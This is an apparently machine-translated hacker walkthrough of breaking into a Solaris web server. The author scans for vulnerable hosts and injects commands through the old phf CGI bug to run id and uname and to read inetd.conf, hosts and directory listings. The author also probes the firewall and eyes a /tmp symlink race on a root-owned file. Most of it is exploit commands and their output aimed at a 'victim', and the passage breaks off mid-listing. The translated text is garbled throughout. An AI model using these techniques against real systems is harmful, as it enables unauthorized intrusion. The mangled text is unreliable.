Quick UNIX skills

First, use a tool to find your target. Such a tool can be easily found online.
Mscan is a famous tool. Its usage is detailed in its own README.
I will not explain it. Of course, it is in English.
Mscan will help you find some remote hosts with obvious vulnerabilities.
I have immediate results. Based on my experience, at least 50% of the results can be handled.
Well, to keep the door open, find the most famous phf bug first.
Test # more co. xx. log | grep phf | more
Xx. xx VULN: runs/cgi-bin/phf. haha!
....
....
Wow! So many, one by one! The machine in this domain area is really #@! #@.
First, let's get started. First, let's look at the httpd he used. If it's root, it's boring.
What do you want to do? Let's give victim to shadow. Otherwise, he will be too absent.
Of course, I am not a bad guy. The hosts in China are too weak and black and boring. // shy.
Test # lynx xx. xx/cgi-bin/phf? Qalias = x % 0aid
Query Results

/Usr/local/bin/ph-m alias = x id
Uid = 60001 (nobody) gid = 60001 (nobody)
En... it's nobody. This increases the difficulty, but it doesn't matter. The more difficult the machine is, the more interesting it is.
And in any case, isn't there already a shell? Come on! Let's see what OS victim is running.
Test # lynx xx. xx/cgi-bin/phf? Qalias = x % 0 auname % 20-a
Query Results

/Usr/local/bin/ph-m alias = x uname-
SunOS host1 5.5 Generic sun4m iSCSI SUNW, SPARCstation-4
En... It's sun solaris 2.5. sun has many bugs, but we haven't
Go to get the shell. Then, let's see what services are running on this machine.
Test # lynx xx. xx/cgi-bin/phf? Qalias = x % 0 acat % 20/etc/inet/inetd. conf
There are too many results below, so I will select a few useful ones.
# OLD # telnet stream tcp nowait root/usr/sbin/in. telnetd in. teln
Etd
# OLD # ftp stream tcp nowait root/usr/local/etc/ftpd in. ftpd
# TIS # ftp stream tcp nowait root/usr/local/etc/netacl in. ftpd
# TIS # telnet stream tcp nowait root/usr/local/etc/netacl in. telne
D
Ftp stream tcp nowait root/usr/sbin/in. ftpd in. ftpd
Telnet stream tcp nowait root/usr/sbin/in. telnetd in. telnetd

Shell stream tcp nowait root/usr/sbin/in. rshd in. rshd
Login stream tcp nowait root/usr/sbin/in. rlogind in. rlogind
Exec stream tcp nowait root/usr/sbin/in. rexmcm in.
En .. it seems unprepared, but it shouldn't be so simple. Look at its hosts.
Test # lynx xx. xx/cgi-bin/phf? Qalias = x % 0 acat % 20/etc/inet/hosts
127.0.0.1 localhost
Xx. xx host1 loghost
Xx. x host1-gw-firewall
Well, there is firewall, which is a headache. Let's see what services can be crossed on firewall.
Test # telnet xxxx. xx
Trying xx. xx ..........
Test # rlogin-l root xxx. xx. xx. x
Test # ftp xxx. xx
Test # rpcinfo-p xx. xx
No response
En. It seems that no external services are allowed! You have to use phf to take a look. Of course not.
It is impossible to get rid of it. but if the administrator trusts firewall too much, it is easy to make mistakes on business trips.
Although we can use this phf to create an exploit, it is quite troublesome. Let's look at symlink first.

Test # lynx xx. xx/cgi-bin/phf? Qalias = x % 0als % 20-la % 20/tmp
Query Results

/Usr/local/bin/ph-m alias = x ls-la/tmp
Total 26
Drwxrwxrwt 2 sys 109 Apr 24.
Drwxr-xr-x 25 root 1024 Apr 24 ..
-Rw-r -- 1 root sys 4856 Mar 25 ps_data
-Rw-1 root 0 Apr 24 license_log
Hey, there is a door. The owner of this license_log is root. It seems that this administrator did not pay attention to lincese_serve.
The tmp race problem. Okay, let's see if it has been put under/. rhosts to guard against this problem.
(Here we know that/tmp. Or/var/tmp is an experience, not a blind one. What is/etc/passwd?
I'm not interested in it. I can't go to it anyway. It's useless to read it. Now, phf has an account)

Test # lynx xx. xx/cgi-bin/phf? Qalias = x % 0als % 20-la % 20/
Query Results

/Usr/local/bin/ph-m alias = x ls-la/
Total 621
Drwxr-xr-x 25 root 1024 Apr 24.
Drwxr-xr-x 25 root 1024 Apr 24 ..
-Rw-r -- 1 root